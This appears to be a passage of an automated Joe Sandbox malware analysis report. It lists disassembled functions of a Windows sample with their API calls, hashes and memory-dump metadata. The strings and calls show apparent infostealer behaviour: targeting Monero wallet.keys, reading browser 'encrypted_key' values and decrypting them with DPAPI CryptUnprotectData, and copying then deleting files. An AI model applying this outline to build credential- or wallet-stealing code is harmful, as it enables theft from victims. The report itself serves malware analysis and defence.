                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAA2E1
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00CAA3FF
                                        • lstrlen.KERNEL32(00000000), ref: 00CAA6BC
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CAA743
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 57f59a24e268b232bfc83931f445c82c4d243626e46a22ce6dd125c5acccbce4
                                        • Instruction ID: 1f11030b30b3056ea150c36ffdde954effadf31da93507e048f4a14e9fc64b23
                                        • Opcode Fuzzy Hash: 57f59a24e268b232bfc83931f445c82c4d243626e46a22ce6dd125c5acccbce4
                                        • Instruction Fuzzy Hash: E2E1EA72C10118AADB14FBA4DCA2EEE733CAF14300F548169F556B6491EF316A4DEB62
                                        Function 00CAD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAD481
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD698
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD6AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CAD72B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: f1ef11923d715a6881690ca7c383165e44014e9deb3f56bb140369df9eb50473
                                        • Instruction ID: 4d9e8ed6df465824ea9b4cb6f035f0f8f07aacff65e3fdf6a01693ac6f04e8f5
                                        • Opcode Fuzzy Hash: f1ef11923d715a6881690ca7c383165e44014e9deb3f56bb140369df9eb50473
                                        • Instruction Fuzzy Hash: 99912F72C10108ABDB18FBA1DCA2EEE733CAF14300F544169F557B6491EF356A09EB62
                                        Function 00CAD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAD801
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD99F
                                        • lstrlen.KERNEL32(00000000), ref: 00CAD9B3
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CADA32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 55467dfeed8bef8e45756bfeab74f2c6c4a958177ff725f02629c906da067c78
                                        • Instruction ID: b9e3d538760dd27b5d1ca01e6d1c024cdc32ec9c98aeb333b1c633940faf2a32
                                        • Opcode Fuzzy Hash: 55467dfeed8bef8e45756bfeab74f2c6c4a958177ff725f02629c906da067c78
                                        • Instruction Fuzzy Hash: 38813172810108ABDB14FBA1DCA2EEE733CAF14300F544128F587B6491EF356A09EB62
                                        Function 00CAF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CC1580,00CC0D92), ref: 00CAF54C
                                        • lstrlen.KERNEL32(00000000), ref: 00CAF56B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: a0043e70105e64d629e799f3b004f8ea29523ec8e89d2228fdb68a1d55d0074a
                                        • Instruction ID: d2a52c0d35717cdbc48c8605b9998bba89f2228b4e27d08ea37752a6800ba75a
                                        • Opcode Fuzzy Hash: a0043e70105e64d629e799f3b004f8ea29523ec8e89d2228fdb68a1d55d0074a
                                        • Instruction Fuzzy Hash: CE511071D10108BADB14FBF4DC96EED737CAF54300F408528F856A7591EE346A09EBA2
                                        Function 00CB3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 3bb17ce67bd11dc7e920c519e2729c63963e5d9df29ab6b5278cddc6eacccaf0
                                        • Instruction ID: 866b8570f3c415db31dbebf325be0d44daa3fc8be9c35913c0f16012cf48b05f
                                        • Opcode Fuzzy Hash: 3bb17ce67bd11dc7e920c519e2729c63963e5d9df29ab6b5278cddc6eacccaf0
                                        • Instruction Fuzzy Hash: 65414E75D10149EFCB08EFA5D895AEEB778BB44304F108028F41677290DB35AA09DFA1
                                        Function 00CA9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CA9D39
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
                                          • Part of subcall function 00CA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
                                          • Part of subcall function 00CA9AC0: LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F
                                          • Part of subcall function 00CA9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA9B84
                                          • Part of subcall function 00CA9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00CA9BA3
                                          • Part of subcall function 00CA9B60: LocalFree.KERNEL32(?), ref: 00CA9BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 47283674950cd9ed5d6a4449e1be8038ac6ef5aaaf68b852fd8bc59659d301df
                                        • Instruction ID: 050bff027e449aa64af7945bf49d8269845a55982c3dd3118cebb0657d7cd4ed
                                        • Opcode Fuzzy Hash: 47283674950cd9ed5d6a4449e1be8038ac6ef5aaaf68b852fd8bc59659d301df
                                        • Instruction Fuzzy Hash: A73110B5D1010AABCB14DFE4DC86EEFB7B8EB49308F144519E915A7241EB309A44CBA1
                                        Function 00CB92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00CB3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00CB3AEE,?), ref: 00CB92FC
                                        • GetFileSizeEx.KERNEL32(000000FF,00CB3AEE), ref: 00CB9319
                                        • CloseHandle.KERNEL32(000000FF), ref: 00CB9327
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: 87c2759d09b30de22dcb1761227eb4f1eacee6f412c4dc660a9aed157a75f541
                                        • Instruction ID: 8d0e28ee762e2ff41bb3aaef34cbb0da296d450f24d2ab3f8e70ba06770e5970
                                        • Opcode Fuzzy Hash: 87c2759d09b30de22dcb1761227eb4f1eacee6f412c4dc660a9aed157a75f541
                                        • Instruction Fuzzy Hash: 59F03C75E44208BBDB10DBF2DC49B9E77F9EB48710F10C268B651AB2D0D6B0A7058B50
                                        Function 00CBC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 00CBC74E
                                          • Part of subcall function 00CBBF9F: __amsg_exit.LIBCMT ref: 00CBBFAF
                                        • __getptd.LIBCMT ref: 00CBC765
                                        • __amsg_exit.LIBCMT ref: 00CBC773
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00CBC797
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: b32c21abc21ee87435effb79711e53bdf7619522bb2e336913485776ba48a8da
                                        • Instruction ID: cc657267a2e172fde3f9f1f41e80abcf1a5fce676bdee71fb84fbea33becb490
                                        • Opcode Fuzzy Hash: b32c21abc21ee87435effb79711e53bdf7619522bb2e336913485776ba48a8da
                                        • Instruction Fuzzy Hash: 7FF0BE329007009BDB21BBF89887BEE33A0AF04721F244149F464B61D2CFA45E40BE96
                                        Function 00CB4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4F7A
                                        • lstrcat.KERNEL32(?,00CC1070), ref: 00CB4F97
                                        • lstrcat.KERNEL32(?,009D8AA8), ref: 00CB4FAB
                                        • lstrcat.KERNEL32(?,00CC1074), ref: 00CB4FBD
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
                                          • Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
                                          • Part of subcall function 00CB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
                                          • Part of subcall function 00CB4910: FindClose.KERNEL32(000000FF), ref: 00CB4B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
